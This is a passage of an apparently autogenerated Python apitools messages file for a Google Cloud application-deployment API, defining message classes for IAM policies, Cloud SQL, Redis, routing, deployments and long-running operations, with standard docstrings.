  resource = _messages.MessageField('ResourceStatus', 3, repeated=True)
# Autogenerated IAM binding message (principals + role + optional condition);
# regenerate rather than hand-editing.
class Binding(_messages.Message):
  r"""Associates `members`, or principals, with a `role`.

  Fields:
    condition: The condition that is associated with this binding. If the
      condition evaluates to `true`, then this binding applies to the current
      request. If the condition evaluates to `false`, then this binding does
      not apply to the current request. However, a different role binding
      might grant the same role to one or more of the principals in this
      binding. To learn which resources support conditions in their IAM
      policies, see the [IAM
      documentation](https://cloud.google.com/iam/help/conditions/resource-
      policies).
    members: Specifies the principals requesting access for a Cloud Platform
      resource. `members` can have the following values: * `allUsers`: A
      special identifier that represents anyone who is on the internet; with
      or without a Google account. * `allAuthenticatedUsers`: A special
      identifier that represents anyone who is authenticated with a Google
      account or a service account. * `user:{emailid}`: An email address that
      represents a specific Google account. For example, `alice@example.com` .
      * `serviceAccount:{emailid}`: An email address that represents a service
      account. For example, `my-other-app@appspot.gserviceaccount.com`. *
      `group:{emailid}`: An email address that represents a Google group. For
      example, `admins@example.com`. *
      `deleted:user:{emailid}?uid={uniqueid}`: An email address (plus unique
      identifier) representing a user that has been recently deleted. For
      example, `alice@example.com?uid=123456789012345678901`. If the user is
      recovered, this value reverts to `user:{emailid}` and the recovered user
      retains the role in the binding. *
      `deleted:serviceAccount:{emailid}?uid={uniqueid}`: An email address
      (plus unique identifier) representing a service account that has been
      recently deleted. For example, `my-other-
      app@appspot.gserviceaccount.com?uid=123456789012345678901`. If the
      service account is undeleted, this value reverts to
      `serviceAccount:{emailid}` and the undeleted service account retains the
      role in the binding. * `deleted:group:{emailid}?uid={uniqueid}`: An
      email address (plus unique identifier) representing a Google group that
      has been recently deleted. For example,
      `admins@example.com?uid=123456789012345678901`. If the group is
      recovered, this value reverts to `group:{emailid}` and the recovered
      group retains the role in the binding. * `domain:{domain}`: The G Suite
      domain (primary) that represents all the users of that domain. For
      example, `google.com` or `example.com`.
    role: Role that is assigned to the list of `members`, or principals. For
      example, `roles/viewer`, `roles/editor`, or `roles/owner`.
  """

  condition = _messages.MessageField('Expr', 1)
  members = _messages.StringField(2, repeated=True)
  role = _messages.StringField(3)
# Autogenerated empty request message for Operations.CancelOperation.
class CancelOperationRequest(_messages.Message):
  r"""The request message for Operations.CancelOperation."""
# Autogenerated apitools message; field numbers are wire tags -- do not reorder.
class CloudRunServiceConfig(_messages.Message):
  r"""Message for Cloud Run service configs.

  Fields:
    image: The container image to deploy the service with.
    resources: Bindings to other resources.
  """

  image = _messages.StringField(1)
  resources = _messages.MessageField('ServiceResourceBindingConfig', 2, repeated=True)
# Autogenerated apitools message; do not hand-edit.
class CloudSqlConfig(_messages.Message):
  r"""Message for a Cloud SQL resource.

  Fields:
    settings: Settings for the Cloud SQL instance.
    version: The database version. e.g. "MYSQL_8_0". The version must match
      one of the values at https://cloud.google.com/sql/docs/mysql/admin-
      api/rest/v1beta4/SqlDatabaseVersion.
  """

  settings = _messages.MessageField('CloudSqlSettings', 1)
  version = _messages.StringField(2)
# Autogenerated apitools message. Note the snake_case field names here
# (generator output mirrors the proto field names verbatim).
class CloudSqlSettings(_messages.Message):
  r"""Message for settings for a CloudSql instance.

  Fields:
    activation_policy: The activation policy of the Cloud SQL instance. e.g.
      "ALWAYS".
    availability_type: The availability type of the Cloud SQL instance. e.g.
      "REGIONAL".
    disk_size: The disk size of the Cloud SQL instance, in GB. This value
      cannot be decreased on Update.
    disk_type: The type of disk for the Cloud SQL instance. e.g. "PD_SSD".
    tier: Tier of the Cloud SQL instance. e.g. "db-f1-micro".
  """

  activation_policy = _messages.StringField(1)
  availability_type = _messages.StringField(2)
  disk_size = _messages.IntegerField(3, variant=_messages.Variant.INT32)
  disk_type = _messages.StringField(4)
  tier = _messages.StringField(5)
# Autogenerated apitools message; do not hand-edit.
class CloudStorage(_messages.Message):
  r"""Configures a Cloud Storage location.

  Fields:
    bucket: Google Cloud Storage bucket containing the source (see Bucket Name
      Requirements).
    object: Google Cloud Storage object containing the source.
  """

  # NOTE(review): the field name shadows the builtin `object`; unavoidable --
  # it mirrors the proto field name from the generator.
  bucket = _messages.StringField(1)
  object = _messages.StringField(2)
# Autogenerated apitools message; do not hand-edit.
class Config(_messages.Message):
  r"""Message for the Application Config Next tag: 6

  Messages:
    ResourcesValue: A ResourcesValue object.

  Fields:
    config: A byte array encapsulating the contents of the application config.
      This can be of any type of supported config (Simple SAF Yaml, multi-file
      in-app config, etc.)
    resources: A ResourcesValue attribute.
  """

  # Map-valued proto field rendered as a repeated key/value message.
  @encoding.MapUnrecognizedFields('additionalProperties')
  class ResourcesValue(_messages.Message):
    r"""A ResourcesValue object.

    Messages:
      AdditionalProperty: An additional property for a ResourcesValue object.

    Fields:
      additionalProperties: Additional properties of type ResourcesValue
    """

    class AdditionalProperty(_messages.Message):
      r"""An additional property for a ResourcesValue object.

      Fields:
        key: Name of the additional property.
        value: A ResourceConfig attribute.
      """

      key = _messages.StringField(1)
      value = _messages.MessageField('ResourceConfig', 2)

    additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)

  config = _messages.BytesField(1)
  resources = _messages.MessageField('ResourcesValue', 2)
# NOTE(review): autogenerated apitools message -- the docstring's
# "Next tag: 13" is stale (fourteen fields, tags 1-14, are defined below);
# regenerate from the discovery document rather than hand-editing.
class Deployment(_messages.Message):
  r"""Message describing Deployment object Next tag: 13

  Messages:
    AnnotationsValue: Unstructured key value map that may be set by external
      tools to store and arbitrary metadata. They are not queryable and should
      be preserved when modifying objects. This field follows Kubernetes
      annotations' namespacing, limits, and rules. More info:
      http://kubernetes.io/docs/user-guide/annotations
    LabelsValue: Labels as key value pairs

  Fields:
    annotations: Unstructured key value map that may be set by external tools
      to store and arbitrary metadata. They are not queryable and should be
      preserved when modifying objects. This field follows Kubernetes
      annotations' namespacing, limits, and rules. More info:
      http://kubernetes.io/docs/user-guide/annotations
    application: Output only. The name of the parent application.
    createSelector: Optional selectors that should be applied to limit the
      scope of the deployment creation.
    createTime: Output only. Create time stamp
    deleteSelector: Optional selectors that should be applied to limit the
      scope of the deployment deletion.
    deleteTime: Output only. For a deleted resource, the deletion time. It is
      only populated as a response to a Delete request.
    etag: Output only. A system-generated fingerprint for this version of the
      resource. May be used to detect modification conflict during updates.
    labels: Labels as key value pairs
    name: Output only. Canonical name of resource
    reconciling: Output only. Indicates whether the resource's reconciliation
      is still in progress.
    render: If specified, the configurations for the deployment will be output
      as described but the underlying resources will not be actuated.
    serviceAccount: Email address of the service account to use for the
      resource actuation.
    status: Output only. The status of the deployment
    updateTime: Output only. Update time stamp
  """

  # Map-valued proto field rendered as a repeated key/value message.
  @encoding.MapUnrecognizedFields('additionalProperties')
  class AnnotationsValue(_messages.Message):
    r"""Unstructured key value map that may be set by external tools to store
    and arbitrary metadata. They are not queryable and should be preserved
    when modifying objects. This field follows Kubernetes annotations'
    namespacing, limits, and rules. More info: http://kubernetes.io/docs/user-
    guide/annotations

    Messages:
      AdditionalProperty: An additional property for a AnnotationsValue
        object.

    Fields:
      additionalProperties: Additional properties of type AnnotationsValue
    """

    class AdditionalProperty(_messages.Message):
      r"""An additional property for a AnnotationsValue object.

      Fields:
        key: Name of the additional property.
        value: A string attribute.
      """

      key = _messages.StringField(1)
      value = _messages.StringField(2)

    additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)

  # Map-valued proto field rendered as a repeated key/value message.
  @encoding.MapUnrecognizedFields('additionalProperties')
  class LabelsValue(_messages.Message):
    r"""Labels as key value pairs

    Messages:
      AdditionalProperty: An additional property for a LabelsValue object.

    Fields:
      additionalProperties: Additional properties of type LabelsValue
    """

    class AdditionalProperty(_messages.Message):
      r"""An additional property for a LabelsValue object.

      Fields:
        key: Name of the additional property.
        value: A string attribute.
      """

      key = _messages.StringField(1)
      value = _messages.StringField(2)

    additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)

  annotations = _messages.MessageField('AnnotationsValue', 1)
  application = _messages.StringField(2)
  createSelector = _messages.MessageField('Selector', 3)
  createTime = _messages.StringField(4)
  deleteSelector = _messages.MessageField('Selector', 5)
  deleteTime = _messages.StringField(6)
  etag = _messages.StringField(7)
  labels = _messages.MessageField('LabelsValue', 8)
  name = _messages.StringField(9)
  reconciling = _messages.BooleanField(10)
  render = _messages.MessageField('Render', 11)
  serviceAccount = _messages.StringField(12)
  status = _messages.MessageField('DeploymentStatus', 13)
  updateTime = _messages.StringField(14)
# Autogenerated apitools message; do not hand-edit.
class DeploymentStatus(_messages.Message):
  r"""Message to encapsulate the current status of the deployment.

  Fields:
    errorMessage: The error message associated with a failed deployment state,
      if applicable.
    status: The status message associated with the current state of the
      deployment.
  """

  errorMessage = _messages.StringField(1)
  status = _messages.StringField(2)
# Autogenerated mirror of google.protobuf.Empty.
class Empty(_messages.Message):
  r"""A generic empty message that you can re-use to avoid defining duplicated
  empty messages in your APIs. A typical example is to use it as the request
  or the response type of an API method. For instance: service Foo { rpc
  Bar(google.protobuf.Empty) returns (google.protobuf.Empty); } The JSON
  representation for `Empty` is empty JSON object `{}`.
  """
# Autogenerated CEL expression message (used by IAM conditions).
class Expr(_messages.Message):
  r"""Represents a textual expression in the Common Expression Language (CEL)
  syntax. CEL is a C-like expression language. The syntax and semantics of CEL
  are documented at https://github.com/google/cel-spec. Example (Comparison):
  title: "Summary size limit" description: "Determines if a summary is less
  than 100 chars" expression: "document.summary.size() < 100" Example
  (Equality): title: "Requestor is owner" description: "Determines if
  requestor is the document owner" expression: "document.owner ==
  request.auth.claims.email" Example (Logic): title: "Public documents"
  description: "Determine whether the document should be publicly visible"
  expression: "document.type != 'private' && document.type != 'internal'"
  Example (Data Manipulation): title: "Notification string" description:
  "Create a notification string with a timestamp." expression: "'New message
  received at ' + string(document.create_time)" The exact variables and
  functions that may be referenced within an expression are determined by the
  service that evaluates it. See the service documentation for additional
  information.

  Fields:
    description: Optional. Description of the expression. This is a longer
      text which describes the expression, e.g. when hovered over it in a UI.
    expression: Textual representation of an expression in Common Expression
      Language syntax.
    location: Optional. String indicating the location of the expression for
      error reporting, e.g. a file name and a position in the file.
    title: Optional. Title for the expression, i.e. a short string describing
      its purpose. This can be used e.g. in UIs which allow to enter the
      expression.
  """

  description = _messages.StringField(1)
  expression = _messages.StringField(2)
  location = _messages.StringField(3)
  title = _messages.StringField(4)
# Autogenerated apitools message; enum values map to proto enum numbers in
# declaration order -- do not reorder.
class GcpResourceStatus(_messages.Message):
  r"""Status for a GCP resource.

  Enums:
    StateValueValuesEnum: The state of the GCP resource.

  Fields:
    errorMessage: The error message associated with the GCP resource, if
      applicable.
    gcpResourceName: The full path of the GCP resource, which can be used to
      query other GCP services.
    state: The state of the GCP resource.
    type: The type of the GCP resource (e.g. "redis").
  """

  class StateValueValuesEnum(_messages.Enum):
    r"""The state of the GCP resource.

    Values:
      GCP_RESOURCE_STATE_UNKNOWN: <no description>
      GCP_RESOURCE_STATE_DEPLOYED: The resource has been deployed.
    """
    GCP_RESOURCE_STATE_UNKNOWN = 0
    GCP_RESOURCE_STATE_DEPLOYED = 1

  errorMessage = _messages.StringField(1)
  gcpResourceName = _messages.StringField(2)
  state = _messages.EnumField('StateValueValuesEnum', 3)
  type = _messages.StringField(4)
class ListApplicationsResponse(_messages.Message):
  r"""Message for the response to listing Applications.

  Fields:
    applications: The list of Application resources.
    nextPageToken: A token identifying a page of results the server should
      return.
    unreachable: Locations that could not be reached.
  """

  applications = _messages.MessageField('Application', 1, repeated=True)
  nextPageToken = _messages.StringField(2)
  unreachable = _messages.StringField(3, repeated=True)
class ListDeploymentsResponse(_messages.Message):
  r"""Message for the response to listing Deployments.

  Fields:
    deployments: The list of Deployment resources.
    nextPageToken: A token identifying a page of results the server should
      return.
    unreachable: Locations that could not be reached.
  """

  deployments = _messages.MessageField('Deployment', 1, repeated=True)
  nextPageToken = _messages.StringField(2)
  unreachable = _messages.StringField(3, repeated=True)
class ListLocationsResponse(_messages.Message):
  r"""The response message for Locations.ListLocations.

  Fields:
    locations: A list of locations that matches the specified filter in the
      request.
    nextPageToken: The standard List next-page token.
  """

  locations = _messages.MessageField('Location', 1, repeated=True)
  nextPageToken = _messages.StringField(2)
class ListOperationsResponse(_messages.Message):
  r"""The response message for Operations.ListOperations.

  Fields:
    nextPageToken: The standard List next-page token.
    operations: A list of operations that matches the specified filter in the
      request.
  """

  nextPageToken = _messages.StringField(1)
  operations = _messages.MessageField('Operation', 2, repeated=True)
class Location(_messages.Message):
  r"""A resource that represents a Google Cloud Platform location.

  Messages:
    LabelsValue: Cross-service attributes for the location. For example
      {"cloud.googleapis.com/region": "us-east1"}
    MetadataValue: Service-specific metadata. For example the available
      capacity at the given location.

  Fields:
    displayName: The friendly name for this location, typically a nearby city
      name. For example, "Tokyo".
    labels: Cross-service attributes for the location. For example
      {"cloud.googleapis.com/region": "us-east1"}
    locationId: The canonical id for this location. For example: `"us-east1"`.
    metadata: Service-specific metadata. For example the available capacity
      at the given location.
    name: Resource name for the location, which may vary between
      implementations. For example:
      `"projects/example-project/locations/us-east1"`
  """

  # MapUnrecognizedFields lets arbitrary JSON keys round-trip through the
  # additionalProperties list instead of being dropped.
  @encoding.MapUnrecognizedFields('additionalProperties')
  class LabelsValue(_messages.Message):
    r"""Cross-service attributes for the location. For example
    {"cloud.googleapis.com/region": "us-east1"}

    Messages:
      AdditionalProperty: An additional property for a LabelsValue object.

    Fields:
      additionalProperties: Additional properties of type LabelsValue.
    """

    class AdditionalProperty(_messages.Message):
      r"""An additional property for a LabelsValue object.

      Fields:
        key: Name of the additional property.
        value: A string attribute.
      """

      key = _messages.StringField(1)
      value = _messages.StringField(2)

    additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)

  @encoding.MapUnrecognizedFields('additionalProperties')
  class MetadataValue(_messages.Message):
    r"""Service-specific metadata. For example the available capacity at the
    given location.

    Messages:
      AdditionalProperty: An additional property for a MetadataValue object.

    Fields:
      additionalProperties: Properties of the object. Contains field @type
        with type URL.
    """

    class AdditionalProperty(_messages.Message):
      r"""An additional property for a MetadataValue object.

      Fields:
        key: Name of the additional property.
        value: A extra_types.JsonValue attribute.
      """

      key = _messages.StringField(1)
      value = _messages.MessageField('extra_types.JsonValue', 2)

    additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)

  displayName = _messages.StringField(1)
  labels = _messages.MessageField('LabelsValue', 2)
  locationId = _messages.StringField(3)
  metadata = _messages.MessageField('MetadataValue', 4)
  name = _messages.StringField(5)
class Operation(_messages.Message):
  r"""This resource represents a long-running operation that is the result of
  a network API call.

  Messages:
    MetadataValue: Service-specific metadata associated with the operation.
      It typically contains progress information and common metadata such as
      create time. Some services might not provide such metadata. Any method
      that returns a long-running operation should document the metadata
      type, if any.
    ResponseValue: The normal response of the operation in case of success.
      If the original method returns no data on success, such as `Delete`,
      the response is `google.protobuf.Empty`. If the original method is
      standard `Get`/`Create`/`Update`, the response should be the resource.
      For other methods, the response should have the type `XxxResponse`,
      where `Xxx` is the original method name. For example, if the original
      method name is `TakeSnapshot()`, the inferred response type is
      `TakeSnapshotResponse`.

  Fields:
    done: If the value is `false`, it means the operation is still in
      progress. If `true`, the operation is completed, and either `error` or
      `response` is available.
    error: The error result of the operation in case of failure or
      cancellation.
    metadata: Service-specific metadata associated with the operation. It
      typically contains progress information and common metadata such as
      create time. Some services might not provide such metadata. Any method
      that returns a long-running operation should document the metadata
      type, if any.
    name: The server-assigned name, which is only unique within the same
      service that originally returns it. If you use the default HTTP
      mapping, the `name` should be a resource name ending with
      `operations/{unique_id}`.
    response: The normal response of the operation in case of success. If the
      original method returns no data on success, such as `Delete`, the
      response is `google.protobuf.Empty`. If the original method is
      standard `Get`/`Create`/`Update`, the response should be the resource.
      For other methods, the response should have the type `XxxResponse`,
      where `Xxx` is the original method name. For example, if the original
      method name is `TakeSnapshot()`, the inferred response type is
      `TakeSnapshotResponse`.
  """

  @encoding.MapUnrecognizedFields('additionalProperties')
  class MetadataValue(_messages.Message):
    r"""Service-specific metadata associated with the operation. It typically
    contains progress information and common metadata such as create time.
    Some services might not provide such metadata. Any method that returns a
    long-running operation should document the metadata type, if any.

    Messages:
      AdditionalProperty: An additional property for a MetadataValue object.

    Fields:
      additionalProperties: Properties of the object. Contains field @type
        with type URL.
    """

    class AdditionalProperty(_messages.Message):
      r"""An additional property for a MetadataValue object.

      Fields:
        key: Name of the additional property.
        value: A extra_types.JsonValue attribute.
      """

      key = _messages.StringField(1)
      value = _messages.MessageField('extra_types.JsonValue', 2)

    additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)

  @encoding.MapUnrecognizedFields('additionalProperties')
  class ResponseValue(_messages.Message):
    r"""The normal response of the operation in case of success. If the
    original method returns no data on success, such as `Delete`, the
    response is `google.protobuf.Empty`. If the original method is standard
    `Get`/`Create`/`Update`, the response should be the resource. For other
    methods, the response should have the type `XxxResponse`, where `Xxx` is
    the original method name. For example, if the original method name is
    `TakeSnapshot()`, the inferred response type is `TakeSnapshotResponse`.

    Messages:
      AdditionalProperty: An additional property for a ResponseValue object.

    Fields:
      additionalProperties: Properties of the object. Contains field @type
        with type URL.
    """

    class AdditionalProperty(_messages.Message):
      r"""An additional property for a ResponseValue object.

      Fields:
        key: Name of the additional property.
        value: A extra_types.JsonValue attribute.
      """

      key = _messages.StringField(1)
      value = _messages.MessageField('extra_types.JsonValue', 2)

    additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)

  done = _messages.BooleanField(1)
  error = _messages.MessageField('Status', 2)
  metadata = _messages.MessageField('MetadataValue', 3)
  name = _messages.StringField(4)
  response = _messages.MessageField('ResponseValue', 5)
class OperationMetadata(_messages.Message):
  r"""Represents the metadata of the long-running operation.

  Fields:
    apiVersion: API version used to start the operation.
    createTime: The time the operation was created.
    endTime: The time the operation finished running.
    requestedCancellation: Identifies whether the user has requested
      cancellation of the operation. Operations that have successfully been
      cancelled have Operation.error value with a google.rpc.Status.code of
      1, corresponding to `Code.CANCELLED`.
    statusMessage: Human-readable status of the operation, if any.
    target: Server-defined resource path for the target of the operation.
    verb: Name of the verb executed by the operation.
  """

  apiVersion = _messages.StringField(1)
  createTime = _messages.StringField(2)
  endTime = _messages.StringField(3)
  requestedCancellation = _messages.BooleanField(4)
  statusMessage = _messages.StringField(5)
  target = _messages.StringField(6)
  verb = _messages.StringField(7)
class Policy(_messages.Message):
  r"""An Identity and Access Management (IAM) policy, which specifies access
  controls for Google Cloud resources. A `Policy` is a collection of
  `bindings`. A `binding` binds one or more `members`, or principals, to a
  single `role`. Principals can be user accounts, service accounts, Google
  groups, and domains (such as G Suite). A `role` is a named list of
  permissions; each `role` can be an IAM predefined role or a user-created
  custom role. For some types of Google Cloud resources, a `binding` can
  also specify a `condition`, which is a logical expression that allows
  access to a resource only if the expression evaluates to `true`. A
  condition can add constraints based on attributes of the request, the
  resource, or both. To learn which resources support conditions in their
  IAM policies, see the [IAM documentation](https://cloud.google.com/iam/hel
  p/conditions/resource-policies).

  **JSON example:** { "bindings": [ { "role":
  "roles/resourcemanager.organizationAdmin", "members": [
  "user:mike@example.com", "group:admins@example.com", "domain:google.com",
  "serviceAccount:my-project-id@appspot.gserviceaccount.com" ] }, { "role":
  "roles/resourcemanager.organizationViewer", "members": [
  "user:eve@example.com" ], "condition": { "title": "expirable access",
  "description": "Does not grant access after Sep 2020", "expression":
  "request.time < timestamp('2020-10-01T00:00:00.000Z')", } } ], "etag":
  "BwWWja0YfJA=", "version": 3 }

  **YAML example:** bindings: - members: - user:mike@example.com -
  group:admins@example.com - domain:google.com - serviceAccount:my-project-
  id@appspot.gserviceaccount.com role:
  roles/resourcemanager.organizationAdmin - members: - user:eve@example.com
  role: roles/resourcemanager.organizationViewer condition: title: expirable
  access description: Does not grant access after Sep 2020 expression:
  request.time < timestamp('2020-10-01T00:00:00.000Z') etag: BwWWja0YfJA=
  version: 3

  For a description of IAM and its features, see the [IAM
  documentation](https://cloud.google.com/iam/docs/).

  Fields:
    bindings: Associates a list of `members`, or principals, with a `role`.
      Optionally, may specify a `condition` that determines how and when the
      `bindings` are applied. Each of the `bindings` must contain at least
      one principal. The `bindings` in a `Policy` can refer to up to 1,500
      principals; up to 250 of these principals can be Google groups. Each
      occurrence of a principal counts towards these limits. For example, if
      the `bindings` grant 50 different roles to `user:alice@example.com`,
      and not to any other principal, then you can add another 1,450
      principals to the `bindings` in the `Policy`.
    etag: `etag` is used for optimistic concurrency control as a way to help
      prevent simultaneous updates of a policy from overwriting each other.
      It is strongly suggested that systems make use of the `etag` in the
      read-modify-write cycle to perform policy updates in order to avoid
      race conditions: An `etag` is returned in the response to
      `getIamPolicy`, and systems are expected to put that etag in the
      request to `setIamPolicy` to ensure that their change will be applied
      to the same version of the policy. **Important:** If you use IAM
      Conditions, you must include the `etag` field whenever you call
      `setIamPolicy`. If you omit this field, then IAM allows you to
      overwrite a version `3` policy with a version `1` policy, and all of
      the conditions in the version `3` policy are lost.
    version: Specifies the format of the policy. Valid values are `0`, `1`,
      and `3`. Requests that specify an invalid value are rejected. Any
      operation that affects conditional role bindings must specify version
      `3`. This requirement applies to the following operations: * Getting a
      policy that includes a conditional role binding * Adding a conditional
      role binding to a policy * Changing a conditional role binding in a
      policy * Removing any role binding, with or without a condition, from
      a policy that includes conditions **Important:** If you use IAM
      Conditions, you must include the `etag` field whenever you call
      `setIamPolicy`. If you omit this field, then IAM allows you to
      overwrite a version `3` policy with a version `1` policy, and all of
      the conditions in the version `3` policy are lost. If a policy does
      not include any conditions, operations on that policy may specify any
      valid version or leave the field unset. To learn which resources
      support conditions in their IAM policies, see the [IAM documentation](
      https://cloud.google.com/iam/help/conditions/resource-policies).
  """

  bindings = _messages.MessageField('Binding', 1, repeated=True)
  # etag is raw bytes (base64-encoded on the wire), not a string.
  etag = _messages.BytesField(2)
  version = _messages.IntegerField(3, variant=_messages.Variant.INT32)
class RedisConfig(_messages.Message):
  r"""Message for Redis configs.

  Fields:
    instance: Configs for the Redis instance.
  """

  instance = _messages.MessageField('RedisInstanceConfig', 1)
class RedisInstanceConfig(_messages.Message):
  r"""Message for Redis instance configs.

  Messages:
    RedisParametersValue: The "raw" Redis configs:
      https://redis.io/topics/config

  Fields:
    memory_size_gb: The Redis instance memory size, in GB.
    redis_parameters: The "raw" Redis configs: https://redis.io/topics/config
    tier: The Redis instance tier, e.g. "STANDARD_HA".
    version: The Redis instance version, e.g. "REDIS_4_0".
  """

  @encoding.MapUnrecognizedFields('additionalProperties')
  class RedisParametersValue(_messages.Message):
    r"""The "raw" Redis configs: https://redis.io/topics/config

    Messages:
      AdditionalProperty: An additional property for a RedisParametersValue
        object.

    Fields:
      additionalProperties: Additional properties of type
        RedisParametersValue.
    """

    class AdditionalProperty(_messages.Message):
      r"""An additional property for a RedisParametersValue object.

      Fields:
        key: Name of the additional property.
        value: A string attribute.
      """

      key = _messages.StringField(1)
      value = _messages.StringField(2)

    additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)

  # NOTE: snake_case field names here mirror the API's JSON field names for
  # this message (unlike the camelCase used elsewhere in this file).
  memory_size_gb = _messages.IntegerField(1, variant=_messages.Variant.INT32)
  redis_parameters = _messages.MessageField('RedisParametersValue', 2)
  tier = _messages.StringField(3)
  version = _messages.StringField(4)
class Render(_messages.Message):
  r"""Message to encapsulate the parameters for a Render.

  Enums:
    FormatValueValuesEnum: The format in which to render the Application.

  Fields:
    format: The format in which to render the Application.
    outputLocation: The output location to push the rendered configs to.
  """

  class FormatValueValuesEnum(_messages.Enum):
    r"""The format in which to render the Application.

    Values:
      RENDER_FORMAT_UNKNOWN: No render format specified.
      RENDER_FORMAT_TERRAFORM: Render into Terraform configs.
      RENDER_FORMAT_KRM: Render into KRM configs.
    """
    RENDER_FORMAT_UNKNOWN = 0
    RENDER_FORMAT_TERRAFORM = 1
    RENDER_FORMAT_KRM = 2

  format = _messages.EnumField('FormatValueValuesEnum', 1)
  outputLocation = _messages.MessageField('Target', 2)
class ResourceConfig(_messages.Message):
  r"""Message for the Resource configuration.

  Fields:
    cloudsql: CloudSql configuration.
    redis: Redis configuration.
    router: Router configuration.
    service: Cloud Run service configuration.
    vpc: VPC configuration.
  """

  cloudsql = _messages.MessageField('CloudSqlConfig', 1)
  redis = _messages.MessageField('RedisConfig', 2)
  router = _messages.MessageField('RouterConfig', 3)
  service = _messages.MessageField('CloudRunServiceConfig', 4)
  vpc = _messages.MessageField('VPCConfig', 5)
class ResourceStatus(_messages.Message):
  r"""Status for a resource.

  Enums:
    StateValueValuesEnum: The enum status of the resource.

  Fields:
    errorMessage: The error message associated with the resource, if
      applicable.
    gcpResource: Repeated field with status per GCP resource created for
      this resource.
    resourceName: Name of the resource, pulled from the Application Config.
    state: The enum status of the resource.
    type: Type of resource.
  """

  class StateValueValuesEnum(_messages.Enum):
    r"""The enum status of the resource.

    Values:
      RESOURCE_STATE_UNKNOWN: <no description>
      RESOURCE_STATE_DEPLOYED: The resource has been deployed.
    """
    RESOURCE_STATE_UNKNOWN = 0
    RESOURCE_STATE_DEPLOYED = 1

  errorMessage = _messages.StringField(1)
  gcpResource = _messages.MessageField('GcpResourceStatus', 2, repeated=True)
  resourceName = _messages.StringField(3)
  state = _messages.EnumField('StateValueValuesEnum', 4)
  type = _messages.StringField(5)
class Route(_messages.Message):
  r"""Message for a single routeable resource within a Router.

  Fields:
    cdn: Whether to enable CDN on the route.
    paths: List of paths to be routed to this route, e.g. ["/*, /api/*"].
      The path must fit the constraints at https://cloud.google.com/load-
      balancing/docs/url-map-concepts#pm-constraints.
    ref: Required. A reference to the resource in the config to which this
      is routing, e.g. "cloudsql/sql_db".
  """

  cdn = _messages.BooleanField(1)
  paths = _messages.StringField(2, repeated=True)
  ref = _messages.StringField(3)
class RouterConfig(_messages.Message):
  r"""Message for a Router resource.

  Fields:
    default_route: The default route config. The URL paths field is not
      required for this route config.
    dns_zone: DNSZone represents an existing DNS zone for the router. It's
      used for the bring-your-own-DNSZone case. If empty, a new managed DNS
      zone shall be created.
    domain: Domain name to associate with the router.
    routes: A list of route configurations to associate with the router.
      Each Route configuration must include a paths configuration.
  """

  default_route = _messages.MessageField('Route', 1)
  dns_zone = _messages.StringField(2)
  domain = _messages.StringField(3)
  routes = _messages.MessageField('Route', 4, repeated=True)
class RunappsProjectsLocationsApplicationsCreateRequest(_messages.Message):
  r"""A RunappsProjectsLocationsApplicationsCreateRequest object.

  Fields:
    application: An Application resource to be passed as the request body.
    applicationId: Required. Id of the requesting object. If auto-generating
      the Id server-side, remove this field and application_id from the
      method_signature of the Create RPC.
    parent: Required. Value for parent.
    requestId: An optional request ID to identify requests. Specify a unique
      request ID so that if you must retry your request, the server will
      know to ignore the request if it has already been completed. The
      server will guarantee that for at least 60 minutes since the first
      request. For example, consider a situation where you make an initial
      request and the request times out. If you make the request again with
      the same request ID, the server can check if the original operation
      with the same request ID was received, and if so, will ignore the
      second request. This prevents clients from accidentally creating
      duplicate commitments. The request ID must be a valid UUID with the
      exception that the zero UUID is not supported
      (00000000-0000-0000-0000-000000000000).
  """

  application = _messages.MessageField('Application', 1)
  applicationId = _messages.StringField(2)
  parent = _messages.StringField(3, required=True)
  requestId = _messages.StringField(4)
class RunappsProjectsLocationsApplicationsDeleteRequest(_messages.Message):
  r"""A RunappsProjectsLocationsApplicationsDeleteRequest object.

  Fields:
    name: Required. Name of the resource.
    requestId: Optional. An optional request ID to identify requests.
      Specify a unique request ID so that if you must retry your request,
      the server will know to ignore the request if it has already been
      completed. The server will guarantee that for at least 60 minutes
      after the first request. For example, consider a situation where you
      make an initial request and the request times out. If you make the
      request again with the same request ID, the server can check if the
      original operation with the same request ID was received, and if so,
      will ignore the second request. This prevents clients from
      accidentally creating duplicate commitments. The request ID must be a
      valid UUID with the exception that the zero UUID is not supported
      (00000000-0000-0000-0000-000000000000).
  """

  name = _messages.StringField(1, required=True)
  requestId = _messages.StringField(2)
class RunappsProjectsLocationsApplicationsDeploymentsCreateRequest(_messages.Message):
  r"""A RunappsProjectsLocationsApplicationsDeploymentsCreateRequest object.

  Fields:
    deployment: A Deployment resource to be passed as the request body.
    deploymentId: Required. Id of the requesting object. If auto-generating
      the Id server-side, remove this field and deployment_id from the
      method_signature of the Create RPC.
    parent: Required. Value for parent.
    requestId: An optional request ID to identify requests. Specify a unique
      request ID so that if you must retry your request, the server will
      know to ignore the request if it has already been completed. The
      server will guarantee that for at least 60 minutes since the first
      request. For example, consider a situation where you make an initial
      request and the request times out. If you make the request again with
      the same request ID, the server can check if the original operation
      with the same request ID was received, and if so, will ignore the
      second request. This prevents clients from accidentally creating
      duplicate commitments. The request ID must be a valid UUID with the
      exception that the zero UUID is not supported
      (00000000-0000-0000-0000-000000000000).
    validateOnly: If true, the Create request will just do a dry run of the
      deploy instead of actuating anything.
  """

  deployment = _messages.MessageField('Deployment', 1)
  deploymentId = _messages.StringField(2)
  parent = _messages.StringField(3, required=True)
  requestId = _messages.StringField(4)
  validateOnly = _messages.BooleanField(5)
class RunappsProjectsLocationsApplicationsDeploymentsGetRequest(_messages.Message):
  r"""A RunappsProjectsLocationsApplicationsDeploymentsGetRequest object.

  Fields:
    name: Required. Name of the resource.
  """

  name = _messages.StringField(1, required=True)
class RunappsProjectsLocationsApplicationsDeploymentsListRequest(_messages.Message):
  r"""A RunappsProjectsLocationsApplicationsDeploymentsListRequest object.

  Fields:
    filter: Filtering results.
    orderBy: Hint for how to order the results.
    pageSize: Requested page size. Server may return fewer items than
      requested. If unspecified, server will pick an appropriate default.
    pageToken: A token identifying a page of results the server should
      return.
    parent: Required. Parent value for ListDeploymentsRequest.
  """

  filter = _messages.StringField(1)
  orderBy = _messages.StringField(2)
